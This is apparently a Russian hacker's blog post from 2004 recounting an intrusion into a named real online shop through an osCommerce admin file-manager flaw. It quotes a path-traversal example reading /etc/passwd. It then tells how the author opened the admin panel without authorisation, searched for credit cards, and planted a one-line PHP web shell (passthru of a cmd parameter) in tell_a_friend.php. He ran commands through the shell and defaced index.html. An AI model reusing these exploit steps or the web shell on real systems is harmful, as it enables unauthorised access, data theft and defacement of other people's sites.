Продолжаем рассказ о пополнении нашего раздела (hacked)
на lwb57.webmen.ru.
20.05.2004 утро. Стандартный просмотр багтрага. Свежие
уязвимости и другие забавные новости из мира интернет безопасности. Одна из
них:
"Удаленный просмотр произвольных файлвов в
osCommerce"
Уязвимость обхода каталога обнаружена в osCommerce. Удаленный
авторизованный администратор может просматривать файлы на целевой системе.
'admin/file_manager.php' не проверяет данные, представленные пользователем в
параметре 'filename'.
Пример:
file_manager.php?action=download&file name=../../../../../../../../etc/passwd
Что ж, еще одна дырка, особо ничем не примечательная, статусом не
вышла (какой же я удаленный авторизованный администратор?) и даже если я им был бы,
на кой мне /etc/passwd.
Но тут на форуме проскакивает фраза от
logos'a о том, что дыра опаснее чем кажется на первый взгляд. Через privat связываюсь с ним, он дает мне линк:
http://www.moonstarlodge.com/catalog/ admin/file_manager.php
Захожу и вижу все файлы и папки директории /catalog/, вхожу в панель
администрирования osCommerce, даже не будучи администратором
;-). Посмотрел я на все это, кредиток не оказалось, и думал уже уйти, но что-то
дернуло посмотреть код php'шек в catalog'овской директории. И тогда я понял, что
имел ввиду logos, когда писал что опасность совсем не низкая. Удаленный
пользователь может редактировать содержимое php-файлов! Понятное дело содержимым
файла tell_a_friend.php стало стандартное <?php passthru("$cmd"); ?>.
Ну а дальше:
http://www.moonstarlodge.com/catalog/ tell_a_friend.php?cmd=ls и так далее. В конце, скромно дописав себя в index.html,
удалился.
З.Ы. Огромное спасибо logos'у.